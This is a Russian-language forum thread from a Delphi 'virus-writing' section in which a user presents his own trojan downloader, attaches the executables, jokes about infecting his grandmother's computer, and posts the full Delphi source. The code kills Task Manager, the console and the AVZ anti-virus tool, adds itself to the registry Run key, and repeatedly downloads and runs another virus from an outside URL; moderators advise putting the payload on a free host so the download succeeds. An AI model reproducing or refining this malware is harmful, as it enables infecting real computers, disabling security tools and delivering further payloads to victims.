Пятница, 14.12.2012, 02:19 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 1 1
Модератор форума: gravitas, C@T  
delfcode » Delphi » Вирусология Delphi » Trojan.Win32.Link (Мной написанный троян DownloadeR)
Trojan.Win32.Link
link993 Дата: Вторник, 14.06.2011, 16:12 | Сообщение # 1
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского" biggrin (если его конечно рассекретят).

После старта он делает следующее:
1. Отрубает и не дает включится следующим процессам:
1.) Блокнот (это так просто);
2.) Диспетчер задач ;
3.) Антивирусная утилита AVZ;
4.) Консоль;
2. Прописывается в реестр;
3. Скачивает вирус Dolphin,a HLLP v.2 (https://delfcode.ru/load/ost/vredonosy/hllp_v_2/14-1-0-447) с этой страницы форума и запускает его;
4. Прекращает свою работу(с закачкой), сидит в памяти и ждет пока его не высекут и не отправят в "Лабораторию Касперского" .
5. Создает ужасные глюки...

Если будете тестировать скачайте прогу чтобы убить процесс троянца. Почистите реестр после запуска по адресу hkey_local_machine\software\microsoft\windows\currentversion\run

Троян с формой, поэтому много весит. Прошу из-за этого сильно не критикуйте. Троян и вирус Вы можете скачать ниже. Если кому-то будет нужен исходник оставляйте просьбу в теме. Комментируйте.

Иконку сменю...

Тестировался на бабушкином компьютере biggrin )) После 10 минут мук бабушка сдалась и вызвала мастера...

Качайте файл link2-Trojan))) biggrin
Прикрепления: hllp.exe(22Kb) · Link.exe(368Kb) · Link2-Trojan-.exe(368Kb)


Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:36
 
gravitas Дата: Вторник, 14.06.2011, 17:43 | Сообщение # 2
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
Quote (link993)
Данный троянец был создан мной для передачи сообщения "Лаборатории Касперского"

Гыы) "ПрЕвЕд" поди biggrin

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
link993 Дата: Вторник, 14.06.2011, 18:30 | Сообщение # 3
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
gravitas, выкуп требую за сына Касперского biggrin

Сообщение отредактировал link993 - Вторник, 14.06.2011, 18:30
 
gravitas Дата: Вторник, 14.06.2011, 20:04 | Сообщение # 4
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
Quote (link993)
gravitas, выкуп требую за сына Касперского

Поймали уже похитителей то) Проактивка постаралась наверно biggrin

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
gravitas Дата: Вторник, 14.06.2011, 20:08 | Сообщение # 5
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
Есть способ наверняка:
Идешь на форум ЛК и создаешь там в определенном разделе топ. Мол аццкой вирь и т.д.) И линк им даешь.
Они конечно посмеются там основательно, но сообщение твое наверняка получат))

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
link993 Дата: Вторник, 14.06.2011, 21:01 | Сообщение # 6
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
Quote (gravitas)
Поймали уже похитителей то) Проактивка постаралась наверно biggrin

НЕт,Ж они там антивирусом все население просканировали и нашли! biggrin

Как вообще троян? Обращятся на форум касперского с самописным трояном это всеравно, что обращатся в фбр с убийством сына касперского biggrin Извини, проблем с законом не хочу...
 
XSPY Дата: Среда, 15.06.2011, 10:07 | Сообщение # 7
Продвинутый
Группа: Проверенные
Сообщений: 205
Статус: Offline
link993, в общем,неплохо.Но,я бы твой вирус не взял бы.Ну скажы-на кой хрен глюки компу?зачем ты зря тратишь процессорное время и ресурсы?
и второй момент-зачем блокнот отрубать?более 90% пользователей инета не смогут ничего твоему вирусу серьезного сделать,так как они не умеют кодить))
а так вроде ниче...

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
link993 Дата: Среда, 15.06.2011, 10:47 | Сообщение # 8
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
XSPY, глюки идут уже после загрузки вируса, в блокноте можно написать бат скрипт, чтобы убить процесс))
 
XSPY Дата: Четверг, 16.06.2011, 22:36 | Сообщение # 9
Продвинутый
Группа: Проверенные
Сообщений: 205
Статус: Offline
link993, блин,будто я не знаю когда глюк идёт! biggrin
Вот и спрашиваеться-нафига глючить комп?ето сразу палит твой вирус!
А бат скрипт рядовой пользователь не напишет,так как дальше "вконтакте" и одноклассников они не ходют.
Ето все ИМХО.
По сабжу: лучше сделай защиту процесса процессом.

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
link993 Дата: Пятница, 17.06.2011, 13:15 | Сообщение # 10
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.
 
gravitas Дата: Пятница, 17.06.2011, 15:07 | Сообщение # 11
Авторитетный
Группа: Модераторы
Сообщений: 371
Статус: Offline
Quote (link993)
Нашел баг)) с delfcode.ru вирус не закачивается, поэтому надо искать другой файловый хостинг (не юкоз), пробовал на спакесе, там все отлично работает.

Еще бы. Надо как бы авторизироваться сначала. Создай сайт на народе. На него вирь кинь. Так будет работать.

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
dolphin Дата: Пятница, 17.06.2011, 15:37 | Сообщение # 12
Создатель
Группа: Администраторы
Сообщений: 910
Статус: Offline
Quote (gravitas)
Создай сайт на народе. На него вирь кинь. Так будет работать.

Точно. Для него любой бесплатный хост подойдёт, народ проще всего и данных о себе много не нужно.



Я не профессионал, я всего лишь любитель.
Я не вредитель, я всего лишь теоретик.
 
link993 Дата: Пятница, 17.06.2011, 17:44 | Сообщение # 13
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
dolphin, gravitas, сПАСИБО)) СДЕЛАЮ)))
 
Fedgrisha Дата: Воскресенье, 26.06.2011, 00:35 | Сообщение # 14
Новичок
Группа: Пользователи
Сообщений: 1
Статус: Offline
дайте пожалуйста исходник его!очень нужно
заранее благодарен!!!!!!!!!
 
link993 Дата: Воскресенье, 26.06.2011, 10:42 | Сообщение # 15
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
Вот на форме мемо только. Форм креат в цикле. Не злитест. Все объединил. Если убрать цыкл на скачку то глюков не будет.

Code
unit Unit1;

interface

uses
     Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
     Dialogs, StdCtrls,Registry,UrlMon,ShellApi ;

type
     TForm1 = class(TForm)
       mmo1: TMemo;
       procedure FormCreate(Sender: TObject);
     private
       { Private declarations }
     public
       { Public declarations }
     end;

var
     Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
const      
    URL = 'http://delfcode.ru/_fr/5/hllp.exe';      
    Filename = 'C:\program.exe';
var
    reg: tregistry;
begin
    while true  do
    begin
    Sleep(5000);
    winexec('taskkill /F /IM NOTEPAD.EXE', SW_HIDE);
    winexec('taskkill /F /IM taskmgr.exe', SW_HIDE);
    winexec('taskkill /F /IM setup.exe', SW_HIDE);
    winexec('taskkill /F /IM avz.exe', SW_HIDE);
    winexec('taskkill /F /IM cmd.exe', SW_HIDE);
    if 0=0 then
    begin
    reg := tregistry.create;
    reg.rootkey := hkey_local_machine;
    reg.lazywrite := false;
    reg.openkey('software\microsoft\windows\currentversion\run', false);
    reg.writestring('ExTaZy', application.exename);
    reg.closekey;
    reg.free;
    if 0=0 then
    begin
    if FileExists('C:\program.exe')
    then
    ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1)
    else
    URLDownloadToFile(nil, PChar(URL), PChar(Filename), 0, nil);
    ShellExecute(0,'Open',PChar('C:\program.exe'),'',nil,1);
    end;
    end;
    end;
end;
end.


Это весь код biggrin

Сообщение отредактировал link993 - Воскресенье, 26.06.2011, 10:45
 
XSPY Дата: Воскресенье, 26.06.2011, 22:23 | Сообщение # 16
Продвинутый
Группа: Проверенные
Сообщений: 205
Статус: Offline
link993, работает только под админом?

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
link993 Дата: Понедельник, 27.06.2011, 09:31 | Сообщение # 17
Постоянный
Группа: Пользователи
Сообщений: 86
Статус: Offline
Не знаю. Не проверял. smile
 
delfcode » Delphi » Вирусология Delphi » Trojan.Win32.Link (Мной написанный троян DownloadeR)
Страница 1 из 1 1
Поиск:

delfcode.ru © 2008 - 2012 Хостинг от uCoz